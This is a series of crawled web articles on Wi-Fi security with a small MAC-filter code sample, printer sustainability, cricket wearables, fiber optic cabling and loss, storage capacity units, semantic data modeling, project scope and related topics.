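    return normalize_mac(mac) in ALLOWED_MACS

print(may_connect("00-1A-2B-3C-4D-5E"))  # True
print(may_connect("66:77:88:99:aa:bb"))  # False
```

Note that MAC addresses can be spoofed by a determined attacker, so MAC filtering is a hurdle rather than strong security; it works best combined with WPA encryption.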
Browse at your own risk
If you connect to a public access point, there are fewer options. Simply put, unsecured Wi-Fi use is a major threat. By connecting to an unsecured wireless network, you are a sitting target for any interested hacker. Information passed through unsecured web pages is accessible. Is it worth sacrificing all the information within your inbox just to check your email?
Although there are problems created by unsecured wireless networks, options are available to protect emailed documents. It’s possible to create secure, encrypted documents that are invulnerable to hackers, when accessed over a wireless network. If you plan to work on an unsecured access point, using extra security on sensitive files will assist in guarding against the vulnerabilities created by using a hotspot.
by Ashley Westling | <urn:uuid:ecf507fc-205f-43af-9145-c049edbe92e3> | CC-MAIN-2017-04 | http://3tpro.com/dallas-wireless-access/unsecured-wi-fi-access-browse-at-your-own-risk | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280900.71/warc/CC-MAIN-20170116095120-00369-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.9275 | 904 | 2.78125 | 3 |
Cartridges, Recycling and Multiple Pages Per Sheet
Printing N-Up (Multiple Pages per Sheet)

Although not as universally useful as duplexing, the ability to print 2, 4, or more document pages on a single sheet of paper is a time-honored way to save paper for draft output. The feature is particularly helpful for users looking to proof the layout of pages. Most printer drivers include this feature. Make sure your users know about it.

Recycled Paper

The argument for using recycled paper is obvious. What may not be obvious is that not all printers can work reliably with it. If you want to take advantage of recycled paper in your company, make sure it's an acceptable media type for any printer you're considering.

Ink Saver Mode

One of the lesser known secrets about the ink-saver options in drivers is that for printers that offer these modes, most output looks just as good whether the ink-saver mode is on or off. In any case, when you're evaluating a printer, it's certainly worth looking for an ink-saver option and testing it to see if you can save ink without sacrificing quality.

Ground versus Grown

Toner can either be physically ground from larger chunks of material or chemically grown. The chemically grown variety is more energy efficient to produce -- by 25 to 35 percent, according to Xerox. That's a little extra green bonus for printers that use grown toner.

Cartridge Capacities

Regardless of page yield, ink cartridges for any given printer are the same size, with the same amount of material. Give extra points to printers with higher-capacity cartridges. Keep in mind, too, that if you have a printer with a choice of cartridges, using the high-capacity cartridge will generate less waste for a landfill (and incidentally cost less per page, so it will also save money).

Recycling and Cartridges

If you count up the number of ink or toner cartridges you use over the lifetime of a printer, you may be appalled both by the sheer number of cartridges and by how large a volume they would use up in a landfill.
When evaluating a printer, ask about the percentage of recycled material in the cartridge, as well as the percentage of recyclable materials (or, even better, reusable parts for remanufacturing the cartridges). You'll also want to make sure the manufacturer has a cartridge recycling program in place. One other thing: if you compare percentages of recyclable materials between cartridges from different printers, be sure the comparisons are indeed comparable; the percentage by volume may be very different from the percentage by weight.

Recycling and Printers

Some of the recycling questions for cartridges apply to the printer itself as well. When you're evaluating a printer, ask if the printer itself contains any recycled materials and, if so, what percentage. Similarly, you should ask what percentage of the printer is made of recyclable materials (or reusable parts), whether the manufacturer has a recycling program, and whether there is any out-of-pocket cost to your company for recycling.
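The cost-per-page claim about high-capacity cartridges is easy to quantify. The sketch below compares standard and high-capacity cartridges; the prices and page yields are invented for illustration, not taken from any vendor:

```python
def cost_per_page(cartridge_price, page_yield):
    """Dollars per printed page for a given cartridge."""
    return cartridge_price / page_yield

# Hypothetical prices and yields.
standard = cost_per_page(24.99, 250)   # roughly 10.0 cents/page
high_cap = cost_per_page(39.99, 600)   # roughly 6.7 cents/page
print(f"standard: ${standard:.3f}/page, high-capacity: ${high_cap:.3f}/page")
```

The same arithmetic shows the waste angle: fewer, larger cartridges per lifetime page count means fewer shells headed to a landfill.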
The Australian cricket team is using wearables to help improve its bowling capabilities.
The team is using technology that’s much more usually found in a military context in a wearable that will help coaches understand the finer details of its bowling prowess.
Wearables used to track bowling
The wearable can track an individual bowler’s performance, monitoring metrics like speed and trajectory. They run algorithms to help understand how fatigue can affect performance.
Bowlers spend huge amounts of time practicing and even the slightest loss of performance ability can cost the team dear in terms of runs. So being able to understand the factors that might affect individual bowler’s performance can help understand how to ensure they remain at the peak of their powers during a game.
A better understanding of individual bowlers' performance can help boost their training regime and prevent injuries. It isn't just cricket that can benefit: the same research group is also helping the Wales rugby team, for example.
The wearable, developed by sports scientists at the Australian Catholic University (ACU), incorporates an accelerometer, gyroscope and magnetometer. These are technologies more usually found in missiles and spacecraft. In this context, they are used to allow the wearable to track a bowler’s movement thanks to an algorithm developed by the sports scientists.
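The ACU team's actual algorithm is not public, but the general shape of such processing can be sketched: accumulate the change in tri-axial acceleration between consecutive samples as a rough movement-intensity score (the data below are invented, and the metric is only loosely modeled on accumulated-acceleration workload measures used in sports science):

```python
def movement_load(samples):
    """Accumulate the magnitude of change in tri-axial acceleration
    between consecutive samples: a rough proxy for workload/fatigue."""
    load = 0.0
    for (x0, y0, z0), (x1, y1, z1) in zip(samples, samples[1:]):
        load += ((x1 - x0) ** 2 + (y1 - y0) ** 2 + (z1 - z0) ** 2) ** 0.5
    return load

# Two hypothetical deliveries: the second is "flatter" (more fatigued).
fresh = [(0, 0, 1), (2, 1, 3), (0, -1, 1), (3, 2, 2)]
tired = [(0, 0, 1), (1, 0, 2), (0, 0, 1), (1, 1, 1)]
print(movement_load(fresh) > movement_load(tired))  # True
```

Comparing such scores across deliveries, sessions, or matches is one way fatigue-related decline in bowling intensity could be detected.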
Wearables and IoT in sport
This is by no means the only example of wearables infiltrating professional sports, with football and cricket clubs in particular using fitness trackers and other devices to see how their stars are performing.
Motor sports, like Formula One, are also now using Internet of Things sensors and platforms to monitor how their cars are faring in real-time, bringing in their drivers at exactly the right time so ensure the team has the best chance of winning. | <urn:uuid:38c1765a-7ec4-4723-8bc8-f58042875e88> | CC-MAIN-2017-04 | https://internetofbusiness.com/australian-cricket-wearables/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281426.63/warc/CC-MAIN-20170116095121-00122-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.957536 | 369 | 2.796875 | 3 |
Base-2 connectivity is a common type of fiber optic link in today's 10G networks, such as LC duplex or SC duplex connections. With Base-2 connectivity, the fiber links are based on increments of two fibers. However, this kind of connectivity cannot meet the demands of 40G links, because the numerous 2-fiber patch cords in the data center would result in an unmanageable, unreliable mess. Therefore, Base-12 and Base-8 connectivity were introduced successively to develop a modular, high-density, structured cabling system for 40G networks. Then, which is more suitable for 40G links, Base-8 or Base-12 connectivity?
This part will give a brief introduction to Base-12 connectivity and Base-8 connectivity respectively.
Inspired by the fact that the TIA/EIA-568A fiber color coding standards are based on groups of 12 fibers, it makes sense that high density connectivity can be based on an increment of the number 12. Thus the 12-fiber MTP connector and Base-12 connectivity were born in the mid-1990s. In a Base-12 system, Base-12 connectivity makes use of links based on increments of 12 fibers with 12-fiber MTP connectors (as shown in the following figure).
Due to the quickly-changing technology associated with transceivers, switches and servers, data centers that want to keep up may need to use Base-8 connectivity. This is because the present, near future, and long term future is full of transceiver types which are based on either Base-2 or Base-8 connectivity. The Base-8 system still uses the MTP connector, but the links are built in increments of 8 fibers (as shown in the following figure). Thus there are 8-fiber trunk cables, 16-fiber trunk cables, 24-fiber trunk cables and so on.
It is known to us that transmission at 40G is mainly based on using eight fibers in the link–four for transmitting and four for receiving at 10G (as shown in the following figure). In addition, QSFP transceivers and MTP connectors are commonly used in the 40G network. Thus we can use Base-12 connectivity and Base-8 connectivity to connect to the QSFP ports.
If Base-12 connectivity is used in the 40G network, it is easy to see that plugging a 12-fiber connector into a QSFP transceiver that requires only eight fibers leaves four fibers unused. Thus, Base-12 to Base-8 conversion modules or harnesses appeared, to enable full utilization of the backbone fiber. The following are three common solutions of Base-12 connectivity for 40G networks:
As seen in the picture above, there are four unused fibers in Solution 1, which leads to a significant and costly loss in fiber network utilization; Solution 2 and Solution 3 add additional MTP connectors and additional insertion loss to the whole link. In this case, Base-12 connectivity is not the optimal solution in a 40G network, for both cost and link performance reasons.
Unlike Base-12 connectivity, Base-8 connectivity enables 100% fiber utilization for QSFP transceivers without any additional cost and insertion loss of Base-12 to Base-8 conversion devices. And its cabling is much more simple and flexible (as shown in the following figure). The imperfection of Base-8 connectivity is that it does not provide as high connector fiber density as that of Base-12 connectivity.
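The utilization gap can be quantified. The sketch below models the Solution 1 case, where each trunk connector feeds one 8-fiber QSFP port (4 transmit + 4 receive at 10G):

```python
def trunk_utilization(fibers_per_connector, fibers_per_port=8):
    """Fraction of trunk fibers carrying traffic when each connector
    feeds one QSFP port needing `fibers_per_port` fibers."""
    used = min(fibers_per_port, fibers_per_connector)
    return used / fibers_per_connector

print(f"Base-12: {trunk_utilization(12):.0%}")  # 67%
print(f"Base-8:  {trunk_utilization(8):.0%}")   # 100%
```

Conversion modules recover the stranded third of the Base-12 fibers, but only by adding connectors, and therefore insertion loss, to the link, which is exactly the trade-off described above.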
Though Base-8 connectivity is superior to Base-12 connectivity in some respects, both Base-8 and Base-12 connectivity will be used in data centers for many years to come. In fact, Base-8 connectivity isn't a universal solution, and in some cases Base-12 connectivity may still be more cost-effective. The following table clearly shows the benefits of Base-8 connectivity and Base-12 connectivity:
|Benefits of Base-8 Connectivity||Benefits of Base-12 Connectivity| | <urn:uuid:fb730658-0b6b-4043-9428-75eb9bb751dc> | CC-MAIN-2017-04 | http://www.fs.com/blog/base-8-or-base-12-connectivity-which-is-better-for-40g-network.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282937.55/warc/CC-MAIN-20170116095122-00030-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.929901 | 835 | 2.890625 | 3 |
Armored cable (just as its name implies, fiber optic cable wrapped in a layer of protective “armor”) is mainly used to protect fiber optic cable against rodents, moisture and other hazards. In the design of armored fiber optic cable, the outer sleeve, usually made of a plastic such as polyethylene, provides protection against solvents, abrasion, etc. The next layer, between the sleeve and the inner jacket, is an armoring layer of materials that are quite difficult to cut, chew, or burn. This armoring material also prevents the fiber cable from being stretched during cable installation. Ripcords are usually provided directly under the armoring and the inner sleeve to aid in stripping the layers for splicing the cable to connectors or terminators. The inner jacket is a protective, flame-retardant material that supports the inner fiber cable bundle. The inner fiber cable bundle includes strength members, fillers and other structures to support the fibers inside. There is usually a central strength member to support the whole fiber cable.
Armored fiber cable can be used for indoor applications and outdoor applications. An armored cable typically has two jackets. The inner jacket is surrounded by the armor and the outer jacket or sheath surrounds the armor.
An armored cable used for outdoor applications typically has a loose tube construction designed for direct burial applications. The armor is generally a corrugated aluminum tape surrounded by an outer polyethylene jacket. This combination of outer jacket and armor protects the optical fibers from gnawing animals and from the damage that can occur during direct burial installations.
Armored cable used for indoor applications may feature tight-buffered or loose-buffered optical fibers, strength members, and an inner jacket. The inner jacket is commonly surrounded by a spirally wrapped interlocking metal tape armor. This type of armor is rugged and provides crush resistance. These cables are used in heavy-traffic areas and installations that require extra protection, including protection from rodents.
When you are going to terminate your own fiber, you should know that:
Indoor interlocking fiber has a 900 µm buffer; loose tube fiber has a smaller 250 µm coating. The loose tube's smaller size benefits manufacturers in making the cables: it allows for an overall smaller diameter of the tube inside the cable, which goes a long way in higher strand count cables, especially considering you only get 12 strands of fiber per tube. If you are going to terminate a "loose tube" fiber cable, don't forget you need fan-out kits, which build the 250 µm coating up to 900 µm and also add strength and durability to the 250 µm fiber.
Not surprisingly, usable capacity is a key metric by which customers buy storage; what may be surprising, however, is how poorly it is understood even within the storage community. Before we get too far I think it's worth explaining what a terabyte is. "Isn't 1TB just one trillion bytes?" That is a perfectly reasonable conclusion to draw - tera is the standard prefix for trillion in base 10. The thing we need to remember is that computers don't do decimal (base 10) math like we do; they do binary (base 2) math. As a computer understands it, 1TB is 2^40, or 1,099,511,627,776 bytes. Similarly, 1GB is actually 2^30, or 1,073,741,824 bytes.
Surely then, when one buys a 6TB drive in a Nimble array or from the local electronics store, it must contain 6,597,069,766,656 bytes, right? Wrong. If you refer to the specifications of nearly any disk on the market today you'll see the capacity footnoted with text something like "1 One gigabyte, or GB, equals one billion bytes and one terabyte, or TB, equals one trillion bytes when referring to drive capacity". Technically this is correct, since the prefixes 'giga' and 'tera' do describe billions and trillions, but it falls 597,069,766,656 bytes short of the expectation. Interestingly, system memory has always been marketed in capacities based on a power of 2 as a result of the way it is addressed, meaning that this capacity difference will only ever apply to disks.
So now let's see how the gap magnifies as the scale gets bigger. The table below shows how the ratio between SI units (standard mega, giga prefixes in base 10) compares with binary units; it is based on a wikipedia article here. What we can see from the table is that the ratio between SI units (standard base 10 mega, giga, tera, peta) and binary units (base 2) grows as the units grow bigger. A 1TB disk that you buy today actually contains a little over 931 GiB of space. If we could manufacture a 1PB disk, it would contain something like 909 TiB of space.
|Multiples of bytes|
|SI decimal prefixes||Value||Binary usage||Ratio (SI ÷ binary)||IEC binary prefixes||Value|
|kilobyte (kB)||10^3||2^10||0.9766||kibibyte (KiB)||2^10|
|megabyte (MB)||10^6||2^20||0.9537||mebibyte (MiB)||2^20|
|gigabyte (GB)||10^9||2^30||0.9313||gibibyte (GiB)||2^30|
|terabyte (TB)||10^12||2^40||0.9095||tebibyte (TiB)||2^40|
|petabyte (PB)||10^15||2^50||0.8882||pebibyte (PiB)||2^50|
|exabyte (EB)||10^18||2^60||0.8674||exbibyte (EiB)||2^60|
|zettabyte (ZB)||10^21||2^70||0.8470||zebibyte (ZiB)||2^70|
|yottabyte (YB)||10^24||2^80||0.8272||yobibyte (YiB)||2^80|
As you can see above, a new naming convention has been created to describe storage capacity in binary terms: what we casually call a terabyte is, in binary terms, properly a tebibyte, or TiB. Sometimes I feel like the only guy using the term; that may be why I feel like I'm having this conversation all the time.
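Each ratio in the table is just 10^(3n) divided by 2^(10n). A few lines of Python reproduce the whole column:

```python
PREFIXES = ["kilo", "mega", "giga", "tera", "peta", "exa", "zetta", "yotta"]

def si_to_binary_ratio(n):
    """Ratio of the SI (base-10) unit to its IEC binary counterpart
    at level n (n=1 is kilo/kibi, n=4 is tera/tebi, and so on)."""
    return 10 ** (3 * n) / 2 ** (10 * n)

for n, prefix in enumerate(PREFIXES, start=1):
    print(f"{prefix}byte: {si_to_binary_ratio(n):.4f}")
```

Because 2^10 is slightly larger than 10^3, the ratio shrinks by a factor of about 0.9766 at every step up the scale, which is why the gap widens from kilobytes to yottabytes.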
To make matters worse, in enterprise storage systems there is additional overhead consumed by things like storage system meta data and array system software. In some cases this additional overhead can consume more than 10% of the purchased capacity in TiB. We have all seen the aggregate effect of both the TB to TiB short-change and the system overhead with things like mobile devices. The screenshot below is from the "About" screen on my iPhone (236 apps! I should delete some...). The 64GB model has just 55.9GiB usable after binary conversion and reserving space for the Operating System. Ironically Apple doesn't bother with the GiB prefix either.
Another reality of modern storage systems is that they tend to have a soft capacity limit beyond which performance will begin to suffer in addition to a hard capacity limit where no more data can be stored. In many cases the soft limit is as low as 60-80% of the system's true capacity further limiting the true usable capacity of that system. For some use cases this performance threshold won't matter; if you're archiving data you want to store every last possible byte without concern for performance implications. For a lot of use cases though guaranteeing that performance doesn't degrade will be critical, and it is worth understanding.
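Putting the pieces together, the sketch below estimates true usable capacity for a hypothetical system after the TB-to-TiB conversion, system overhead, and a soft performance limit. The 10% overhead and 80% soft limit are illustrative figures drawn from the ranges mentioned above, not any vendor's specification:

```python
def usable_tib(marketed_tb, overhead_fraction=0.10, soft_limit=0.80):
    """Estimate usable TiB from a marketed base-10 TB figure."""
    raw_bytes = marketed_tb * 10 ** 12
    tib = raw_bytes / 2 ** 40          # binary conversion
    tib *= 1 - overhead_fraction       # metadata / system software
    tib *= soft_limit                  # stay under the performance knee
    return tib

print(f"A '100 TB' system: ~{usable_tib(100):.1f} TiB truly usable")
```

For an archive workload you might set `soft_limit` to 1.0 and reclaim that headroom, which mirrors the point that the performance threshold matters only for some use cases.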
I doubt there's any changing the disk industry at this point, but you can challenge your enterprise storage system suppliers to tell you about the true usable capacity of their system in tebibytes after accounting for system overhead and performance thresholds - and when they ask what a tebibyte is (and they likely will), send them here. I've helped my customers decode the real capacity of my competitors' systems while those competitors struggled to accurately describe a terabyte.
Enterprise data modeling has remained an arduous, time-consuming task for myriad reasons, not the least of which is the different levels of modeling required across an organization’s various business domains.
Data modelers have to consider conceptual, logical and physical models, in addition to those for individual databases, applications, and a variety of environments such as production and post-production. Oftentimes, the need to integrate new sources or to adapt to changing business or technology requirements exacerbates this process, causing numerous aspects of it to essentially begin all over again.
Enterprise data modeling is rendered much simpler with the incorporation of semantic technologies—particularly when compared to traditional relational ones. Nearly all of the foregoing modeling layers are simplified into an evolving semantic model that utilizes a standards-based approach to harmonize modeling concerns across an organization, its domains, and data environments.
Moreover, the semantic approach incorporates visual aspects that allows modelers to discern relationships between objects and readily identify them with a degree of precision that would require long periods of time with relational technologies.
“Semantics are designed for sharing data,” Franz CEO Jans Aasman reflected. “Semantic data flows into how people think.”
The crux of the semantic approach to data modeling is in the technology’s ability to define relationships between data and their different elements. In a standards-based environment, data objects are given specific descriptions courtesy of triples that are immensely useful in the modeling process. “The most important thing in semantic modeling is that everything is done completely declaratively,” Aasman revealed. “So instead of thinking about how you do things, you think about what you have.” The self-describing nature of triples is integral to semantic models because it allows those models to determine the relationships between different data elements. “You are very explicit about the relationships between objects in your data, so semantic modeling is far more like object-oriented modeling than relational database modeling,” Aasman said. Those relationships, which are easily visualized in an RDF graph, function as the building blocks of semantic models. Additionally, there are no schema limitations in a standards-based environment, which saves time and effort when modeling across applications, domains, or settings—which is required for enterprise data modeling.
The issue of schema is critical to conventional data modeling, particularly when incorporating additional requirements or new data types and sources. Semantic models are based on standards that any type of data can adhere to, so that there is “a standardized semantic model across many different data sources,” Paxata Chief Product Officer Nenshad Bardoliwalla said. All data can conform to the conventions of semantic models. Thus, when updating those models with additional requirements, there are fewer steps that data modelers have to go through. In relational environments, if one wants to incorporate a new data source into a data model of three other data sources, one would have to make adjustments to all of the databases to account for the new data types. Frequently, that re-calibration pertains to schema. In a standards-based environment, one would simply have to alter the new data source to get it to conform to the semantic model—which saves time and energy while expediting time to action. “Because we don’t have to redefine the schema all the time, it’s easier to use semantic technology,” Aasman remarked. “But it’s not impossible in a relational world.”
The Importance of Vocabularies
According to TopQuadrant CTO Ralph Hodgson, the precision of expression in semantic models—which allows organizations to model aspects of regulatory requirements and other governance necessities—is possible because the semantic model is “the model that is the most expressive thing that we have today. You don’t do that with an object model, you don’t do it in UML, you don’t do it with an entity relationship model, you don’t do it in a spreadsheet. You do it with a formalism that allows you to express a rich set of relationships between things.”
Nonetheless, enterprise data modeling is abetted in a semantic environment with vocabularies and systems for unifying terms and definitions throughout the enterprise. These technologies assist with the modeling process by ensuring clarity among all of the terms that actually mean the same things, yet are expressed differently (such as spellings, subsidiaries of companies, names, etc.). The result is that “you’re using the same word for the same thing,” Aasman maintained.
One can attempt to model most facets of terminology and their meanings. However, there are specific semantic technologies that address these points of distinction and commonality much faster to actually aid existent semantic models and ensure points of clarity between different data types, sources, and other characteristics of enterprise data modeling. “When we talk about how do you actually link and contextualize data and develop a data lake and its relationships, those taxonomies and vocabularies are actually central to being able to do that effectively,” Cambridge Semantics VP of Solutions and Pre-Sales Ben Szekely observed.
Modeling Enterprise Data
Perhaps the easiest way to facilitate enterprise data modeling is with the incorporation of an organization’s entire data into an RDF graph. Smart data lakes provide this capability in which all data assets are linked together in a graph with a comprehensive semantic model that quickly adds new sources and requirements. “The ability to do semantics is essentially the ability to create an enterprise graph of the entire enterprise and its information,” Cambridge Semantics VP of Marketing John Rueter said. “Up until now it’s been done at a departmental level.” Facets of regulatory compliance, data governance, and other organizational particulars can all coalesce into such an inclusive model, which provides a monolithic framework for the fragmented concerns of the different layers of modeling that have traditionally monopolized the time of data modelers. In these instances, the majority of the preparation work for modeling is done upfront and simply requires that additions conform to ontological model requirements.
Enterprise data modeling is considerably simplified with smart data approaches. Modelers can largely account for all of the disparate layers of modeling in a single semantic model that is supported by requisite vocabularies and terminology definitions. Furthermore, that model is based on standards that allow additional sources or requirements to mesh with it by adhering to those standards. Improvements in analytics and data discovery are just some of the many benefits of this approach, which saves substantial time, effort, and cost. “You can ask the data what’s the relationship between things, rather than making guesses and asking the data is your guess correct,” Cambridge Semantics VP of Engineering Barry Zane commented.
When one considers that such data can encompass all enterprise information assets, the potential impact of such insight—both for data modelers that facilitated it and for business users that perform better with it—is nothing short of transformative. “People in the world of semantics make sure that their models are entirely self descriptive and self explanatory,” Aasman stated. “There’s far more emphasis on being very clear about the relationships between types of objects.” | <urn:uuid:363ad5b1-66b0-4d61-a98c-d4783ea26532> | CC-MAIN-2017-04 | https://analyticsweek.com/content/enterprise-data-modeling-made-easy/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280239.54/warc/CC-MAIN-20170116095120-00022-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.927802 | 1,514 | 2.59375 | 3 |
As a project manager, you'll need to define project scope no matter what methodology you choose to use.
Defining what is needed is the first step toward establishing a project timeline, setting of project goals and allocating project resources. These steps will help you to define the work that needs to be done - or in other words, define the scope of the project. Once this is defined, you'll be able to allocate tasks and give your team the direction they need to deliver the project on time and on budget.
Read more in project management
Understand the project objectives
In order to define the scope of a project, it is necessary to first establish the project objectives. The objective of a project may be to produce a new product, create a new service to provide within the organisation, or develop a new bit of software. There are any number of objectives that could be central to a given project - and it is the role of the project manager to see that their team or contractors deliver a result that meets the specified functions and features.
How do you define the project scope?
The work and resources that go into the creation of the product or service are essentially the things that frame the scope of the project. The scope of the project outlines the objectives of the project and the goals that need to be met to achieve a satisfactory result. Every project manager should understand how to define the project scope and there are some steps that can be followed when doing this.
Steps for defining the scope of a project
To define a project scope, you must first identify the following things:
- Project objectives
Once you've established these things, you'll then need to clarify the limitations or parameters of the project and clearly identify any aspects that are not to be included. In specifying what will and will not be included, the project scope must make clear to the stakeholders, senior management and team members involved, what product or service will be delivered.
Alongside of this, the project scope should have a tangible objective for the organisation that is undertaking the project. The purpose may be to create a better product for a company to sell, upgrade a company's internal software so that they can deliver better service to their customers or to create a new service model for an organisation. These things are integral to defining the project scope, because they will play a part in how project methodologies are applied to the project to bring it to completion.
As a project manager, understanding and being able to define project scope will give you a focus and sense of purpose when executing the project. Understanding the scope provides you with the foundations for managing project change and risk management. It enables goal setting and a timeline to work towards, as well as key points for reporting on the progress of the project to senior management and other stakeholders.
Project management recommended reading:
- How to create a risk register
- Risk and project management go hand in hand
- Project management for the small business
- The project management survival toolkit
- Understanding project management processes and tools to drive success
- How to tailor your presentation to the audience
- How to approach a project
- The trouble with continuous multi-tasking
- Communication risks within and around a virtual team
- An objective methodology to project prioritisation
- Program & project manager power – What are your most important traits to achieve success
- Anatomy of an effective project manager
- The unspoken additional constraint of project management
- How project managers can help their companies 'go Green'
- What makes an effective executive?
- Minimising bias of subject matter experts through effective project management
- Program and project manager power
Join the CIO Australia group on LinkedIn. The group is open to CIOs, IT Directors, COOs, CTOs and senior IT managers. | <urn:uuid:de625e93-497e-4443-a58d-9fca7f4bc9b1> | CC-MAIN-2017-04 | https://www.cio.com.au/article/401353/how_define_scope_project/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00324-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.918234 | 773 | 2.984375 | 3 |
There is no similarity either. It is more like a cause-and-effect system.
Dialog design is used to form a dialog flow between two procedures or procsteps.
A tool in the Design Toolset that is used during External Design to produce Dialog Flow Diagrams. It automates the representation of the steps within a dialog and illustrates their sequence.
The transfer of control, and possibly data, between procedure steps in the same generated business system (internal flows) or between procedure steps in different business systems (external flows). There are two types of dialog flows: links and transfers.
Dialog design is the process to create dialog flows. | <urn:uuid:a4df4763-2e50-44c7-bf43-caa2cc1be283> | CC-MAIN-2017-04 | http://ibmmainframes.com/about31044.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00352-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.933378 | 132 | 2.703125 | 3 |
Arizona State University, like many colleges across the United States, has a problem with students who enter their freshman year ill prepared in math. Though the school offers remedial classes, one-third of students earn less than a C, a key predictor that they will leave before getting a degree. To improve the dismal situation, ASU turned to adaptive-learning software by Knewton, a prominent edtech company. The result: pass rates zipped up from 64% to 75% between 2009 and 2011, and dropout rates were cut in half.
But imagine the underside to this seeming success story. What if the data collected by the software never disappeared and the fact that one had needed to take remedial classes became part of a student’s permanent record, accessible decades later? Consider if the technical system made predictions that tried to improve the school’s success rate not by pushing students to excel, but by pushing them out, in order to inflate the overall grade average of students who remained.
These sorts of scenarios are extremely possible. Some educational reformers advocate for “digital backpacks” that would have students carry their electronic transcripts with them throughout their schooling. And adaptive-learning algorithms are a spooky art. Khan Academy’s “dean of analytics,” Jace Kohlmeier, raises a conundrum with “domain learning curves” to identify what students know. “We could raise the average accuracy for the more experienced end of a learning curve just by frustrating weaker learners early on and causing them to quit,” he explains, “but that hardly seems like the thing to do!” | <urn:uuid:74393f2d-f35c-4c40-8484-610b4ee6ce84> | CC-MAIN-2017-04 | http://www.nextgov.com/big-data/2014/03/how-big-data-will-haunt-you-forever-your-high-school-transcript/80266/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00352-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.972681 | 337 | 3.125 | 3 |
The Donald Danforth Plant Science Center is a not-for-profit scientific facility located in Creve Coeur, Missouri, United States. The Center's mission is to "improve the human condition through plant science". Founded in 1998 by William Henry Danforth, a cardiologist, the Center was established through a $60 million gift from the Danforth Foundation, a $50 million gift from the Monsanto Fund, the donation of 40 acres of land from Monsanto, and $25 million in tax credits from the State of Missouri. Wikipedia.
Umen J.G.,Donald Danforth Plant Science Center
Current Opinion in Microbiology | Year: 2011
Sexual reproduction in Volvocine algae coevolved with the acquisition of multicellularity. Unicellular genera such as Chlamydomonas and small colonial genera from this group have classical mating types with equal-sized gametes, while larger multicellular genera such as Volvox have differentiated males and females that produce sperm and eggs respectively. Newly available sequence from the Volvox and Chlamydomonas genomes and mating loci open up the potential to investigate how sex-determining regions co-evolve with major changes in development and sexual reproduction. The expanded size and sequence divergence between the male and female haplotypes of the Volvox mating locus (MT) not only provide insights into how the colonial Volvocine algae might have evolved sexual dimorphism, but also raise questions about why the putative ancestral-like MT locus in Chlamydomonas shows less divergence between haplotypes than expected. © 2011 Elsevier Ltd.
Donald Danforth Plant Science Center | Date: 2015-09-10
Provided are transgenic plants expressing KP6 antifungal protein and/or KP6 and polypeptides, exhibiting high levels of fungal resistance. Such transgenic plants contain a recombinant DNA construct comprising a heterologous signal peptide sequence operably linked to a nucleic acid sequence encoding these molecules. Also provided are methods of producing such plants, methods of protecting plants against fungal infection and damage, as well as compositions that can be applied to the locus of plants, comprising microorganisms expressing these molecules, or these molecules themselves, as well as pharmaceutical compositions containing these molecules. Human and veterinary therapeutic use of KP6 antifungal protein and/or KP6 and polypeptides are also encompassed by the invention.
Donald Danforth Plant Science Center | Date: 2012-03-26
DNA constructions that provide for production of potent antifungal proteins in transgenic plants and transformed yeast cells are described. Methods of using the DNA constructs to produce transgenic plants that inhibit growth of plant pathogenic fungi are also disclosed. The use of transformed yeast cells containing the DNA constructs to produce the antifungal proteins and methods of isolating the antifungal proteins are also described.
Donald Danforth Plant Science Center | Date: 2013-05-13
Provided are enhanced high yield production systems for producing terpenes in plants via the expression of fusion proteins comprising various combinations of geranyl diphosphate synthase large and small subunits and limonene synthases. Also provided are engineered oilseed plants that accumulate monoterpene and sesquiterpene hydrocarbons in their seeds, as well as methods for producing such plants, providing a system for rapidly engineering oilseed crop production platforms for terpene-based biofuels.
Donald Danforth Plant Science Center and University of Missouri | Date: 2015-09-25
Provided are plants that express, or overexpress, a pPLAIII protein. Constitutive or seed-specific expression of pPLAIII protein in | <urn:uuid:d616ab98-4b1b-4920-b1e4-404297e88986> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/donald-danforth-plant-science-center-22157/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00352-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.91011 | 771 | 2.8125 | 3 |
Fiber optic transmission has various advantages over other transmission methods such as copper or radio. Fiber optic cable, which is lighter, smaller, and more flexible than copper, can transmit signals at faster speeds over longer distances. However, many factors can influence the performance of fiber optic, and many issues must be considered to ensure stable performance. Fiber optic loss is far from a negligible issue among them, and it has long been a top priority for engineers when selecting and handling fiber optic. This article offers detailed information on fiber optic loss.
When a beam of light carrying signals travels through the core of fiber optic, its strength gradually becomes lower and the signal becomes weaker. This loss of light power is generally called fiber optic loss or attenuation, and the decrease in power level is described in dB. Various effects during transmission cause fiber optic loss; to transmit optical signals smoothly and safely, this loss must be kept to a minimum. The causes of fiber optic loss fall into two categories: internal causes and external causes, also known as intrinsic fiber core attenuation and extrinsic fiber attenuation.
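The dB figure used to quantify attenuation is a logarithmic ratio of input power to output power. A minimal sketch of the arithmetic (the power values used are illustrative, not measurements from this article):

```python
import math

def attenuation_db(power_in_mw, power_out_mw):
    """Total fiber loss in dB, from input and output optical power."""
    return 10 * math.log10(power_in_mw / power_out_mw)

def output_power(power_in_mw, loss_db):
    """Optical power remaining after a given loss in dB."""
    return power_in_mw / (10 ** (loss_db / 10))

# A 3 dB loss means roughly half the optical power is gone.
print(round(attenuation_db(1.0, 0.5), 2))  # 3.01
print(output_power(1.0, 10.0))             # 0.1 mW left after a 10 dB loss
```

The logarithmic scale is convenient because losses from different causes along a link simply add in dB.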
Internal causes of fiber optic loss originate in the fiber optic itself, which is why this category is usually called intrinsic attenuation. There are two main causes of intrinsic attenuation: light absorption and scattering.
